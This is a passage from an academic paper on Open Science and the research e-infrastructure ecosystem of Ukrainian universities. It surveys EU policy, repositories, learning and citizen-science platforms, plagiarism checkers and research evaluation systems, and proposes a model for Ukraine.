Gerber, S. Carson [14], J. Tijdink, S. Horbach, M. Nuijten, G. O’Neill [15], etc. The source basis for the study of modern standards of research e-infrastructures were UNESCO regulations [16], information sources and policy documents, analytical and methodological developments in the field of research infrastructures and Open Science of the EU and European University Association [17–24], etc. Their analysis and generalisation contributed to shaping the ideas on preconditions, strategic goals, objectives, achievements and problems of developing the open science research e-infrastructures ecosystem at the institutional (including university), national and European levels. At the same time, they proved the lack of a single approach among researchers and practitioners
Modelling the Universities’ E-Infrastructure
277
on defining the concepts of an “open science”, “research infrastructure”, and “research e-infrastructure”, their content, structure, and main components, which can be explained by the complexity and relative novelty of the studied phenomena. So, we should have substantiated the complex of main components of an “open science ecosystem” and clarified the content and structure of universities’ research infrastructures ecosystem as a crucial condition for strengthening their research capacity under the digital transformations and growing demands from society on openness, inclusiveness, responsibility, and innovative character of science. The Ukrainian context of our study is based on the publications of: O. Chmyr, who analysed the development of research e-infrastructure in Ukraine, in particular creating the National Repository of Academic Texts [25]; O. Orliuk, who considered Ukraine’s legal steps towards integration into the European Open Science Cloud on the public authorities’ activities and fulfilment of obligations under the Association Agreement between Ukraine and the European Union [26]. The study’s theoretical basis involves the analytical materials of “Theoretical Bases of Increasing the Ukrainian Universities’ Research Capacity in the Context of Implementing the Open Science”, developed in particular by the authors of this paper I. Drach, O. Petroye and N. Bazeliuk [2]. The generalised Ukrainian regulative acts and analytical materials, which reflect the political, organisational and functioning principles of developing the open science research infrastructure of national universities, also comprise the source base of the study. Despite the undeniable value of recent publications of foreign and domestic researchers, the analysis of their results showed the lack of systematic developments in the development of ecosystems of e-infrastructure support for research activities of universities in Open Science. A review of basic regulations of Ukraine, a study of methodological and analytical documents that reflect the organisational and functional principles of universities’ research activities development confirmed that there are theoretical and practical issues of open science, research infrastructure and research e-infrastructures of universities in Ukraine development, which determined the choice of the research topic. The study’s goal is to theoretically substantiate the model of the Ukrainian universities’ research e-infrastructures ecosystem for the development of open science in Ukraine. Achieving the goal is done by performing three specific tasks: (1) analyse conceptual approaches and provide a generalised vision of Open Science, determine the main components of its ecosystem; (2) conduct theoretical substantiation of the model of research e-infrastructures ecosystem of Ukrainian universities; (3) identify priorities and provide recommendations for the development of research e-infrastructures of open science in Ukrainian universities. The paper structure logically follows the tasks aimed at achieving the goal, which allows to develop a general scheme and identify the main thematic blocks of the study within the framework set by the paper regulations. The thematic block “Materials and methods” describes the primary theoretical material on open science as a critical object in which e-infrastructures are being deployed to ensure the functioning of research activities of universities. The next stage of our study covers the analysis of source data and general schemes of functioning of the research infrastructures for open science and developing research e-infrastructures. The obtained results allowed us to clarify the issues and some
278
I. Drach et al.
aspects of research e-infrastructures development policy in the Ukrainian universities. In turn, the generalisation of theoretical materials and analytical data obtained during the analysis allowed us to propose a model of Ukrainian universities’ open science research e-infrastructure and justify the composition and role of its main components. An important place in the structure of the study is given to the recommendations addressed to the subjects of the institutional (university) and national levels, responsible for providing research e-infrastructure of universities for the development of Open Science in Ukraine.
2 Materials and Methods The presentation of the main materials of the study begins with the coverage of conceptual provisions that reveal the content of the open science ecosystem. 2.1 Open Science Ecosystem The need to provide conditions for universities’ research activities in martial law and the economic recovery of Ukraine in the post-war period actualises the increase in research quality through digital transformation, which is aimed at the Open Science policy, actively implemented in the ERA and EHEA. According to the Rome Ministerial Communiqué, higher education institutions need to be supported in the use of digital technologies for teaching, learning and assessment, as well as for academic communication and research, investing in the development of digital skills and competences for all [27]. Open Science is “an inclusive construct that combines various movements and practices aiming to make multilingual scientific knowledge openly available, accessible and reusable for everyone, to increase scientific collaborations and sharing of information for the benefits of science and society, and to open the processes of scientific knowledge creation, evaluation and communication to societal actors beyond the traditional scientific community. It comprises all scientific disciplines and aspects of scholarly practices, including basic and applied sciences, natural and social sciences and the humanities, and it builds on the following key pillars: open scientific knowledge, open science infrastructures, science communication, open engagement of societal actors and open dialogue with other knowledge systems” [28, p. 7]. Open Science is a change in the system that allows to improve science through open and collaborative ways of producing and sharing knowledge and data as early as possible in the research process, as well as for communicating and sharing results. This new approach is influencing research institutions and research practices, creating new ways of funding, evaluating and rewarding researchers. Open Science enhances the quality and impact of science by promoting reproducibility and interdisciplinarity. This makes science more efficient through better exchange of resources, more reliable and more sensitive to the needs of society. Eight ambitions of the Open Science policy are determined: • Open data: FAIR principles and open data exchange should be a condition for funding research in the EU countries;
Modelling the Universities’ E-Infrastructure
279
• European Open Science Cloud (EOSC) development as “a unified ecosystem of research data infrastructures”, which will allow the scientific community to share and process research results regardless of borders and research fields; • New generation metrics: new indicators need to be developed to complement the generally accepted ones for evaluating the research quality and impact to pay tribute to open scientific practices; • Future of research communication: all peer-reviewed scientific publications should be freely available, and early exchange of different types of scientific results should be encouraged; • Rewards: scientific career evaluation systems should fully recognise the openness of scientific activity; • Research integrity: all the EU-funded research should meet commonly agreed standards of research integrity; • Education and skills: all researchers in Europe should have the necessary skills and support to apply open science procedures and practices; • Citizen science: the general public should be able to contribute significantly to the production of scientific knowledge in Europe [24]. Open Science is built on the following key pillars: open scientific knowledge, open science infrastructures, open engagement of societal actors and open dialogue with other knowledge systems [16, p. 11]. Open scientific knowledge refers to open access to scientific publications, research data, metadata, open educational resources, software, and source code and hardware that are available in the public domain or under copyright. It also refers to the possibility of opening research methodologies and evaluation processes [16, p. 9]. Open science infrastructures refer to shared research infrastructures (virtual or physical, including major scientific equipment or sets of instruments, knowledge-based resources such as collections, journals and open access publication platforms, repositories, archives and scientific data, current research information systems, open bibliometric and scientometric systems for assessing and analysing scientific domains, open computational and data manipulation service infrastructures that enable collaborative and multidisciplinary data analysis and digital infrastructures) Open science infrastructures are often the result of community-building efforts, which are crucial for their longterm sustainability and therefore should be not-for-profit and guarantee permanent and unrestricted access to all public to the largest extent possible [16, p. 12]. Open engagement of societal actors refers to extended collaboration between scientists and societal actors beyond the scientific community, by opening up practices and tools that are part of the research cycle and by making the scientific process more inclusive and accessible to the broader inquiring society based on new forms of collaboration and work such as crowdfunding, crowdsourcing and scientific volunteering. Furthermore, citizen science and citizens’ participation have developed as models of scientific research conducted by non-professional scientists, following scientifically valid methodologies and frequently carried out in association with formal, scientific programmes or with professional scientists with web-based platforms and social media, as well as open-source hardware and software [16, p. 13].
280
I. Drach et al.
Open dialogue with other knowledge systems refers to the dialogue between different knowledge holders, that recognizes the richness of diverse knowledge systems and epistemologies and diversity of knowledge producers in line with the 2001 UNESCO Universal Declaration on Cultural Diversity. It aims to promote the inclusion of knowledge from traditionally marginalized scholars and enhance interrelationships and complementarities between diverse epistemologies, adherence to international human rights norms and standards, respect for knowledge sovereignty and governance, and the recognition of rights of knowledge holders to receive a fair and equitable share of benefits that may arise from the utilization of their knowledge. In particular, building the links with indigenous knowledge systems needs to be done [16, p. 15]. When implementing changes in universities related to the implementation of Open Science, its characteristics and indicators should be taken into account (Fig. 1): • open research data: research data repositories; funder policies on data sharing; researcher attitudes towards data sharing; • open scholarly communication: open peer reviews; journal policies on open peer reviews; use of altmetric platforms; corrections and retractions; • open access to publication: open access to publication; preprints; alternative publishing platforms; funder policies on open access; journal policies on open access; researcher attitudes towards open access [31]. But Open Science is therefore not a series of static issues, but a complex mix of themes and topics yet to be identified. Universities will need to ensure that they are fully informed on the potential impacts of Open Science as the concept develops [22, p. 7].
Fig. 1. Open Science “Wheel” describing key Open Science characteristics and indicators (from Open Science Monitor) [2, p. 47], [24], [31, p. 134]
Modelling the Universities’ E-Infrastructure
281
Today Open Science, which makes research accessible to all, acquires the characteristics of a standard way of producing knowledge. In the conditions of Open Science, the role of universities grows. The role of universities as subjects of Open Science is that the community of students, researchers and professionals, including graduates and a wide range of partners, citizens, united in institutions with networks at the local, national and international levels, build bridges between countries, cultures and sectors, is a demonstration of peaceful and constructive European and international cooperation for high-quality research and innovation, as well as teaching and learning [16, p. 5]. A necessary task for modelling the universities’ open science ecosystem is to clarify the features of the research infrastructures functioning that underlie the knowledge triangle: research, education and innovation [29, p. 4]. Offering unique research services to users from different countries, involving representatives of different interest groups in science, forming a network of research objects, research infrastructures contribute to structuring scientific communities, play a key role in building effective research and innovation environment, promote institutional, national, regional, European and global economic development. According to the UNESCO Recommendation on Open Science (2021), open research infrastructures are components of common, virtual and physical, research infrastructures needed to support Open Science and serve the needs of different research communities. The ecosystem of open scientific infrastructure is formed by open laboratories, open scientific platforms and repositories for publications, research data and source codes, software development and virtual research environments, etc. Examples of open science infrastructures are open innovation test benches, including incubators, accessible research facilities, open licenses, as well as science shops, science museums, science parks and research complexes that provide shared access to physical facilities, open science opportunities and services [16, p. 12]. The EU has a well-established tradition of building effective research infrastructure ecosystems to meet science needs, provide resources and services to members of the research community, conduct research and promote innovation. The value of studying the EU experience in this field for Ukrainian universities has been growing since June 9, 2022, the agreement associating Ukraine with Horizon Europe, the EU research and innovation programme (2021–2027) and the Euratom Research and Training Programme (2021–2025) entered into force, following its ratification by Ukraine [28]. The Ukrainian research and innovation actors can now fully participate in these programmes on equal terms with entities from the EU member states. The main components of the European research infrastructure are: scientific equipment or toolkits; collections, archives and scientific data; computer systems and communication networks; any other research and innovation infrastructure of a unique nature, open to external users [20]. By definition of the High-Level Expert Group to Assess the Progress of ESFRI and Other World Class Research Infrastructures [30, p. 10], the concept of research infrastructure, in addition to basic equipment, toolkits and knowledge containing resources such as collections, archives and data banks, also covers relevant human resources. It also addresses unique tools, resources and services to ensure a high level of research in all science fields. European research infrastructures aimed at ensuring cooperation, inclusiveness, openness, and access to world-class infrastructures
282
I. Drach et al.
in various fields of knowledge have significantly contributed to the transformation of science in Europe and the world. They play an essential role in enabling the broadest community of researchers to carry out breakthrough research, make scientific discoveries, develop technologies and inventions, and promote competences, innovations and competitiveness. The development of research infrastructures, equipment and services is also based on the recognition that they are crucial for maintaining and strengthening the EU’s leading position in the development of research and innovation. Universities play a significant role in the process of building research infrastructures. They provide key scientific and technical results of research infrastructures, deploy and operate them, strengthening research and innovation capacity in Europe, and train and prepare researchers, technicians and managers of research infrastructure [31, pp. 147– 148]. However, according to experts, the role of universities, as well as their research infrastructures, is still insufficiently recognized and not always involved in both the national and EU contexts. Universities face cultural, technical, financial and other barriers to sharing access to research infrastructure with each other and with non-academic sectors [31, p. 31]. The European University Association’s vision of the decade “Universities without walls” by 2030 recognises that the key to universities’ success in rooting out their values of openness and deepening engagement with other sections of society [32, p. 3]. Moreover, additional investment in physical and digital research infrastructures is crucial in strengthening the role and capacity of European universities in the sphere of science, education and innovation. With proper organisation, universities, students, and society can benefit from building research infrastructures [32, p. 11]. Therefore, the financial policies of the EU and its member states until 2030 are aimed at helping universities to develop research infrastructures to strengthen their capacity to create and disseminate relevant knowledge and in-demand to address societal challenges. The legal framework for university cooperation at the EU level is provided by the European Research Infrastructure Consortium (ERIC) [19] and the European Grouping of Territorial Cooperation (EGTC) [31, pp. 39–40]. ERIC promotes the creation and operation of new or existing research infrastructures with European interests: • preserving fundamental democratic values and the rule of law in the EU; • maintaining broadly similar economic trajectories between the EU member states and regions; • ensuring the EU’s role as a global leader in the fight against climate change; • support for a reliably and evenly controlled EU external border; • support for constructive and principled relations with the EU’s neighbours and support for a cooperative international system and good relations with the third countries [33, p. 1]. 2.2 General Context of Establishing and Developing Research E-Infrastructures One of the most critical components of the open science ecosystem today is research einfrastructures, which differ from other research infrastructures in their ability to provide digital services, resources and tools for research and promote innovation.
Modelling the Universities’ E-Infrastructure
283
Experts from the Global Research Data Infrastructures (GRDI) consider two concepts for defining e-infrastructure. According to the network concept, e-infrastructure (research data infrastructure) is a set of managed network environments for digital, scientific data, consisting of services and tools that support: (1) the whole research cycle, (2) the movement of scientific data across scientific disciplines, (3) the creation of open linked data spaces by connecting data sets from diverse disciplines, (4) the management of scientific workflows, (5) the interoperation between scientific data and literature, and (6) an integrated science policy framework. According to the authors of this concept, the condition for the effective functioning of network research e-infrastructure is the design and engineering of its three key objects – organisational practice, technical infrastructure and social structure, which together ensure uninterrupted joint research activities in different geographical areas. According to the relational concept, e-infrastructure (data) is an intermediary between research communities and data/publication collections, mediated services and tools [21]. Research e-infrastructures combine digital technologies, computing resources and open opportunities for scientific cooperation, creation of new virtual research communities based on exchanges, integration, access and sharing of research tools and resources, etc., which change over time to meet the needs of a dynamically changing research process [34]. They can be located on one website, and can be hosted on a large number of different websites that work together; they can be of various sizes, ranging from largescale facilities of European importance, national facilities to individual institutional and functional infrastructure facilities [30, pp. 10–11]. The development of research e-infrastructures in the EU has received particular attention since 2015, with the European community recognising the crucial importance of the digital economy and defining the EU’s ambitious digital policy aimed at breaking down digital barriers and building Europe as a world leader in the digital economy by creating an environment conducive to the prosperity of digital networks and services; ensuring better access of consumers and businesses to online goods and services; maximising the growth potential of the digital economy. Thus, from 2014 to 2020, through the Horizon 2020 e-infrastructure programme, the EU invested more than 850 million euros in digital infrastructure [35, p. 126]. Since 2015, the development of EOSC has been initiated, taking place in three stages. In 2015–2018, which allowed researchers to access the resources they needed to perform their research activities, some separate projects were implemented, laying the foundation for a joint research infrastructure. The transition period of 2019–2020 was focused on expanding cooperation within and between research communities and projects, developing a sustainable governance model for the EOSC, organised around the EOSC Association [35, pp. 162–163]. Launched and funded by the Horizon 2020, the EOSC portal provides a universal channel for researchers to access open services, data and other resources from a wide range of national, regional and institutional research infrastructures across Europe. It covers a wide range of sectors and facilitates the interaction of datasets and tools from different vendors, as well as allows researchers to do their work faster and disseminate the results of their research more widely [17]. Under the current development period (2021–2027), the EOSC Association will work in partnership with the EC, member states
284
I. Drach et al.
and associated countries under the Horizon Europe Research and Innovation Programme for 2 million European researchers [35, pp. 162–163]. The development of research e-infrastructures is an integral component and an essential task of the new strategy “Shaping Europe’s Digital Future”, which started in 2020 [36, p. 17]. The Digital Europe Programme (DIGITAL), a new EU funding programme aimed at providing digital technologies to businesses, citizens and public administrations with a total budget of e 7.5 billion for 2021–2027, has been launched to implement the EU’s digital transformation plans. The Digital Europe programme complements funding available through other EU programmes, such as Horizon Europe for research and innovation and Connecting Europe for digital infrastructure, aimed at digital transforming European society and the economy [37]. Thus, through developing strategic plans and programmes and implementing special funding instruments, the EU plays a crucial role in modernising national e-research infrastructures in the EU member states, harmonising them with the e-infrastructure ecosystem of the European Research Area. By supporting open science policy, the EU supports European science, industry and public authorities in developing world-class e-infrastructures for data storage and management, high-speed transport connectivity and powerful high-performance data processing computers [17]. At the same time, the European university community is based on the understanding that European funding programmes are significant for European cooperation, however, they should work in addition to sufficient public funding [32, p. 11].
3 Results The next stage of the study was the analysis of components of research e-infrastructures in crucial areas of Open Science, and the main result was the theoretical substantiation of the model of research e-infrastructures ecosystem of Ukrainian universities, based on the generalization of theoretical constructs and analysis of the actual state of affairs of the researched sphere in Ukraine. 3.1 Problems and Tasks for the Development of Research E-Infrastructures in Ukraine According to the results of the audit of the State Audit Office of Ukraine conducted in 2019–2020, one of the main barriers to the development of research e-infrastructure in Ukraine is the digital divide, which makes it impossible to realise the rights and responsibilities of researchers, all citizens due to restrictions on access to technology, competencies, means of digital production and interaction. Overcoming the problem of digital gaps is impossible due to the extremely low level of investment in Ukraine in R&D, which reaches 0.5% of GDP and is three times lower than in Poland [3, p. 40]. The level of digital competences of the educational and scientific process participants is also insufficient. The lack of digital infrastructure would allow establishing effective interaction between education, research institutions and business [38]. The task of developing Open Science research e-infrastructures is due to several strategic plans of Ukraine outlined in the pre-war period, which do not lose their relevance in martial law and will be essential to accelerate the post-war recovery of our
Modelling the Universities’ E-Infrastructure
285
country. Thus, the development of the digital economy as one of the drivers of economic growth was identified in the “National Economic Strategy for 2030” [39]. Forming the foundations for Open Science and digital innovation, developing research infrastructure, the state of which ensures the integration of researchers in the ERA, integration of Ukrainian e-infrastructures into European e-infrastructures and their consolidation are among the central goals, ensuring access of Ukrainian researchers to European research infrastructures. The development of innovation infrastructures taking into account the best European practices and other goals were outlined in the plan of “Roadmap for the Integration of Ukraine’s Science and Innovation System into the ERA” [40]. Design and development of a modern ecosystem of Ukrainian research e-infrastructure taking into account modern ERA practices, is one of the key goals and objectives of the Concept of the “State Target Programme for the Development of Research Infrastructures in Ukraine until 2026” [41]. According to the “Concept of Recovery Plan” outlined by the Cabinet of Ministers of Ukraine in May 2022, one of the main principles of the Recovery Plan of Ukraine is its development as an advanced digital state and compliance with the EU candidate country criteria [42, p. 5]; this emphasizes the importance and urgency of R&D of an effective model of research e-infrastructures ecosystem of Ukrainian universities. 3.2 Substantiation of the Model for Open Science E-Infrastructure of Ukrainian Universities The research e-infrastructure ecosystem is considered by us as a subsystem in the open science ecosystem and is a set of e-tools that provide resources and services to researchers, staff, students and other members of the open science research community to conduct research and promote innovation. Developed taking into account the European standards and available research e-infrastructure of Ukraine, the proposed model of research e-infrastructures ecosystem of Ukrainian universities is aimed at ensuring the effective functioning of each of its components (open research data; open access to publications; citizen science; education and skills; research responsibility and integrity; research performance evaluation), and the whole open science ecosystem (Fig. 2). This model reflects the main directions of policy on the formation and development of the Ukrainian research e-infrastructures ecosystem of universities, which create opportunities for researchers, staff, students and other research community members to engage in Open Science at all stages of research and promote the integration of university research ecosystems into the national research area, ERA and EHEA. 3.3 Open Science Policy The implementation of Open Science in universities involves the development of appropriate institutional policies in general and policies for the use of research e-infrastructures in particular. We consider that the policy on Open Science should include: • including in the university development strategies the goals for the implementation of Open Science principles in general and goals for the creation and support of the development of research infrastructures in particular;
286
I. Drach et al.
Fig. 2. The model of research e-infrastructures ecosystem of Ukrainian universities. Source: designed by the authors.
• defining the role and responsibilities of administrative staff, researchers, faculty and students in implementing the policy; • creating a system of motivation (recognition and rewards) for researchers, faculty and students for involvement in the policy’s implementation; • defining mechanisms for investing in e-infrastructure; • developing the mechanisms for monitoring and reviewing the policy; • training and consulting researchers, faculty and students on using e-infrastructures at all stages of the research data life cycle. To acquaint the leadership and academic staff of universities with the opportunities and benefits of Open Science, the Institute of Higher Education of the National Academy of Educational Sciences of Ukraine under the EU project “Reinventing Displaced Universities: Enhancing Competitiveness, Serving Communities” (REDU) (2020–2024), the authors of the paper conducted trainings on the research activities in the implementation of the concept of Open Science and scientometrics in the evaluation of research results. We will analyse the possibilities of using e-infrastructures following the main components of Open Science.
Modelling the Universities’ E-Infrastructure
287
3.4 Open Research Data The open research data concept is connected with a new paradigm of Open Science and anticipates that scientist results should be open access (presented in the most usable (digital, online) and accessible (free of charge, free of most copyright and licensing restrictions) forms). Besides, it is expected that “the data acquired by individual scientists and scientist groups should be subject to a default position whereby it is made findable, accessible, interoperable and reusable (FAIR)”. Although there are concerns that open research data infrastructures and systems may fall under the control of Internet and cloud services providers whose interests may not coincide with those of the wider research community, but open research data itself gives obvious benefits and has the potential to deliver greater efficiencies in research, improve its rigour and reproducibility, enhance its impact, increase public trust in its results [43]. Existing research in this area, noting the obvious benefits of using open research infrastructures, emphasises the existence of certain limitations – “reusing qualitative data conflicts with some of the epistemological and methodological principles of qualitative research; there are ethical concerns about making data obtained from human participants open, which are not completely addressed by consent and anonymisation; many research projects are small scale and the costs of preparing and curetting data for open access can outweigh its value” [44]. Even though infrastructures for placement and use of scientific data (such as Figshare, Zenodo, Open Science Framework, Mendeley Data) are widely used in the EU countries, it remains difficult for many researchers to find appropriate services to handle the data they create, and to locate data they might wish to use. 3.5 Open Access to Publication Open access to publications plays an essential part in the Open Science policy, allowing the research results to be more accessible. The Ukrainian universities have an opportunity to use the National Repository of Academic Texts, Digital Library of the National Academy of Educational Sciences of Ukraine, institutional repositories, and other online services like Directory of Open Access Journals, Directory of Open Access Books, Figshare, Zenodo, etc. The National Repository of Academic Texts (nrat.ukrintei.ua) is a nationwide distributed electronic database in which academic texts are accumulated, stored and systematised. The purpose of the National Repository is to make scientific and international information of Ukraine and the world as accessible as possible, which will promote the development of educational, research, and innovative activities by improving access to academic texts and promoting academic integrity. Academic texts stored in the National Repository are subject to copyright and protected by the law. It consists of a central repository maintained by the administrator and local repositories maintained by institutional participants. At the beginning of 2022, the National Repository presented metadata of 162.8 thousand research reports (107.9 thousand full texts) and 162.8 thousand metadata of theses (108.4 thousand full texts) [45]. The Digital Library of the National Academy of Educational Sciences of Ukraine (lib.iitta.gov.ua) at the end of 2021 included more than 26.1 thousand full-text resources, which were downloaded more than 8.8 million times, of which almost 1.7 million in
288
I. Drach et al.
2021 compared to 1 million in 2018. According to monitoring data, the website in 2021 had more than 47.6 thousand users and 594.0 thousand page views from 182 countries (most users from Ukraine – 75%) [46, p. 20]. 3.6 Education and Skills Integration of ICT solutions into the process of skills development corresponds with the need to make the training process more flexible and relevant to a person’s needs. The complex of e-solutions (especially when it comes to the common educational/research activities of teams) can include not only planning software (Slack, Yammer, Hip Chat), cloud technologies (Google Drive), platforms for correspondence, calendaring, documents (Google, Apple, Microsoft) but also software for learning (Moodle, Prometheus) and real-time communication (Google Meet, Microsoft Teams, Zoom). Moodle is the most popular platform with modern LMS, which counts 316 million users worldwide, 1.8 billion course enrolments, 41 million courses in 42 languages, 179,000 Moodle sites [47] and offers open access to education technology. The platform has been created as an open source with a publicly accessible design which enables users to modify and share it. Such open-source learning represents the learner-directed model of skills development with the possibility of creating a specific learning environment (for teachers) and participating in shared learning experiences online (for learners). According to research, this platform has both advantages: functionality (with such sub characteristics as suitability, accurateness, interoperability, security), reliability (including maturity, fault tolerance, recoverability), usability (sub characteristics are understandability, learnability, operability, attractiveness), efficiency (including time behaviour and resource utilization), maintainability (sub characteristics are analysability, changeability, stability) and portability (testability, adaptability, install ability, conformance, replaceability) [48], and also some limitations: the system is not fully developed to cope with big projects, the website can also shut down on occasion, blocking the opportunity for students to access course materials, besides Moodle users frequently complain about the troubles they experience with customizations, etc. [49]. Prometheus is the largest open online education platform in Ukraine, with 1,800,000 users, more than 250 courses, and about 1,000,000 certificates issued. Prometheus is also the only Ukrainian platform with mobile applications Android and iOS [50]. The platform offers paid distance courses from well-known teachers and free courses that help to develop skills in various aspects. Unlike the Moodle platform, Prometheus is not an open source, and the project team handles technical issues of course placement and administration. Customization is done by creating a unique graphic design of the course and its content, which, however, is also implemented by the team. Platforms that traditionally are used as real-time communication tools (Google Meet, Microsoft Teams, Zoom) are also widely used for skills development by “bringing students at multiple home locations, classroom sites or field sites together via video/audio conferencing”, “inviting guest lecturers to your courses for interviews, presentations and conversations, recording these sessions for further use as instructional content invite guest lecturers to your courses for interviews, presentations and conversations,” “providing visual meeting space for students outside of regular class time and for online courses” [51]. They also have a number of “unique features that enhance its potential
Modelling the Universities’ E-Infrastructure
289
appeal to qualitative and mixed-methods researchers” [52]. For instance, the functionality gives possibility to collect qualitative interview data. In several research it was concluded that respondents generally “rated Zoom above alternative interviewing mediums such as face-to-face, telephone, and other videoconferencing services, platforms, and products” … “because of its relative ease of use, cost-effectiveness, data management features, and security options” [52]. Using tools such as breakout rooms (available in the Zoom environment), the user can also implement research methods such as group activities, expert evaluation, Delphi analysis, foresight, assessment centres, etc. Q&A sessions are also helpful for greater engagement; they can be public or private; attendees can view, comment, and upvote questions. It is also possible to “create a few pre-planned high-quality questions in case attendee questions are not submitted quickly” [53]. 3.7 Citizen Science Citizen Science is a collaboration between researchers and those interested in collecting data, documenting changes, monitoring social and natural phenomena or making activities to help advance different kinds of research to promote creativity, scientific literacy, and innovation [54]. The rapid development of Citizen Science over the last decade is due, on the one hand, to diversified changes in various phenomena of society and nature (which cannot be carefully studied due to lack of resources, including empirical data), and, on the other, – the desire of citizens to become engaged in the process of knowledge co-creation, “actively setting the agenda, crowdsourcing via web platforms, and collecting and analysing a broad spectrum of scientific data” [55]. The latest research shows that the development of a strong connection between researchers and citizens can be quite beneficial for both sides, making “distinct, novel and innovative contributions to scientific knowledge”, by “advancing distinct research techniques, such as computational modelling, to draw useful insights from opportunistic datasets and technologies”, creating “cross-disciplinary networking” [55]. From our point of view, for the development of citizen science, it is crucial to create/use IT-appropriate infrastructure, considering compliance of IT tools with the applicable process and data standards, their ability to connect with the information supply chain, etc. It is also vital that “the information and data generated by citizen science projects are likely to be the most enduring and impactful legacy if they are made publicly accessible on time and in a form suitable for multiple downstream uses” [55]. One of such tools is a platform “Science to Business” which has been developed to “bring together three worlds which should work together but too often stumble apart: industry, research and policy” (universities, companies, and research and policy organisations) [56]. Its functionality helps to implement a wide range of targeted and tailored communications activities, including strategic advice, editorial, policy research, high-level networking, intelligence, event organisation and online promotion. Another platform is EU-Citizen Science for sharing knowledge, tools, training and resources, which serves as a knowledge hub and the European reference point for citizen science in aid of its mainstreaming [57]. It contains 230 projects engaging the public in research via citizen science activities, 190 useful resources for planning and running citizen science projects, 61 training resources about the practice of citizen science, 205 organisations involved in citizen science projects and research, and 2,237 users.
290
I. Drach et al.
In 2022, the Ministry of Education and Science of Ukraine launched “Science 2 Business” (s2b.nauka.gov.ua), an online platform for communication and effective interaction between business and the scientific community. The platform enables businesses to find the scientific result necessary for their development and researchers – to realise their scientific potential and commercialise their research results. The initiative aims to develop an innovative economy in Ukraine and create an attractive, competitive, and high-quality business environment for investors, focused on the practical use of Ukrainian researchers’ R&D results [58]. 3.8 Responsibility Research and Integrity Open and transparent practices accelerate the research process with unprecedented speed and strengthen core academic values such as research integrity, collaboration and knowledge sharing. With greater openness comes greater responsibility for all Open Science actors, which, together with public accountability, sensitivity to conflicts of interest, vigilance about the possible social and environmental consequences of research, intellectual honesty and respect for ethical principles, should be the basis for good governance of Open Science [16, p. 18]. Open Science is also the key to increasing public responsibility and trust in science [23]. The development of Internet technologies creates favourable conditions for the dissemination of information and its illegal copying. Increasing the openness of the information space and providing free access to the vast majority of publications allows for copyright infringement. Preliminary (primary) detection of plagiarism in scientific, educational, scientific and methodical works, theses and qualification works is recommended to be carried out through expert evaluation (review, feedback from supervisors) and using computer programmes. Basic characteristics of standard programmes for textual borrowing examination are: the ability to search on the Internet, search in local databases, opportunities to work with different text forms, simplicity of the interface face, batch verification service, protection against bypassing the algorithm for replacing letters, rewrite analysis support (synonym recognition), report generation function, additional means of text analysis. Analysis of modern systems of academic texts examination in the world has allowed identifying the most used ones, namely: WCopyFind (USA), Turnitin (USA), Viper (Great Britain), Urkund (Sweden), PlagScan (Germany), StrikePlagiarism (Poland), Unicheck (Ukraine), IThenticate (USA), CrossRefPlagiarismCheck (USA). Free software products (AntiPlagiarism.NET, Advego Plagiatus, Double Content Finder (DCFinder), Plagiarism Detector, etc.) and commercial software (Turnitin, Unplag, Plagiat.pl, Unicheck) are presented in Ukraine. In the Ukrainian education system, the use of online services that check text documents for borrowed parts of the text is carried out in order to implement the requirements of the Law of Ukraine “On Education” (Article 42) [59]. One such service is Unicheck (formerly Unplag.com), a paid online service that checks text documents for borrowed parts. Created by Ukrainian developers, namely the IT company PhaseOneKarma [60] in 2014, the service can be used online or integrated into the internal database of user documents (so-called Learning Management Systems). Such LMS include Moodle, Canvas, Blackboard, Schoology, Google Classroom and others.
Modelling the Universities’ E-Infrastructure
291
The analysis of service delivery has shown its positive characteristics: Unicheck navigation system requires minimal technical support and special equipment (computer, browser and Internet access), works with such formats as *doc, *docx, *pdf, *odt, *rtf, *html and with an unlimited number of users at a time. The programme allows to create an individual user profile and check both within the local database and on the Internet. The user receives a report on uniqueness, indicating the plagiarism percentage and its source, while the borrowed text is highlighted in a different colour. The service allows to edit text online and recheck it. The service is used by more than 1,100 universities in more than 100 countries. Currently, the service is used by more than 50 Ukrainian universities. Continuous improvement and innovation of products, compliance with the criteria of quality, wide availability and responsibility of the service enabled the purchase of Unicheck in 2020 by the American company Turnitin [61]. Several programmes that provide a plagiarism test service have been developed by Plagiat.pl (namely: StrikePlagiarism.com, AKAMBIKO, ASAP, BookWatch, etc.). According to the criterion of prevalence, a successful product is StrikePlagiarism.com [62]. StrikePlagiarism.com is a service created in 2002 to test academic writing for plagiarism, which is used by more than 500 universities in Poland, Germany, Spain, Portugal, Romania and more. In 2018, after signing a Memorandum with the Ministry of Education and Science of Ukraine, the service became available to the Ukrainian university community [63]. Among the sources that index and integrate StrikePlagiarism.com is an aggregator of popular scientific journals (Cambridge, Oxford, Springer, etc.). The system works based on SaaS and meets the criteria of quality, versatility, and confidentiality. The advantages of the service support service are round-the-clock support, as its offices are located in different time zones, and the programme adaptation to 15 languages (English, German, French, Spanish, Turkish, Polish, Romanian and others). The service is paid and available for both universities and individual users. CrossRef has been “designed to develop and maintain a global hightech infrastructure for scientific communications” [64], and provides its members with access to SimilarityCheck. SimilarityCheck is a text uniqueness checker based on Turnitin’s iThenticate plagiarism detection tool. iThenticate is one of the world’s most common paid payment tools for verifying the uniqueness of texts. According to its developers, nowadays, every third academic journal (more than 1,300 publishers) [65] is connected to iThenticate. The tool is actively used by editors of Nature, Elsevier, Springer, Wiley and others. Thus, with greater openness comes greater responsibility for all open science actors. To ensure the responsibility and integrity of researchers, the implementation of open science practices should take place based on honesty at all stages of research (development, implementation, reporting); transparency (providing complete and unbiased information on research results through open communication), respect for all participants in the research process (colleagues, other research participants, society), conducting research following applicable norms and standards (ethical, legal and professional).
292
I. Drach et al.
3.9 Research Performance Evaluation Development of responsible research and researcher evaluation practices under the Open Science should incentivize quality science, recognizing the diversity of research outputs, activities and missions [16, p. 22]. In recent years, some initiatives have been launched in Ukraine concerning the research performance evaluation, i.e., the functioning of the Open Ukrainian Citation Index, development of the Ukrainian Research Information System, creation of the national ORCID consortium, etc. The Ukrainian Research Information System (URIS) is created to monitor the scientific and technical activities and increase the efficiency of management decisions on the use of material and financial resources. The system integrates data on institutions, researchers, projects, publications and research infrastructures, automates the MoES of Ukraine procedures (including certification, accreditation and record keeping) and contains useful information for researchers, authors of scientific publications and editors of scientific journals. With the introduction of the system, researchers will have a single point of access to research information, funding organizations will be able to more easily track the results of funded research, for business it will be easier to find promising technologies, the public and journalists will receive information on key areas of national science and technology [66]. The Open Ukrainian Citation Index (ouci.dntb.gov.ua) is a search engine and database of scientific citations that comes from all publications that use the Cited-by service from 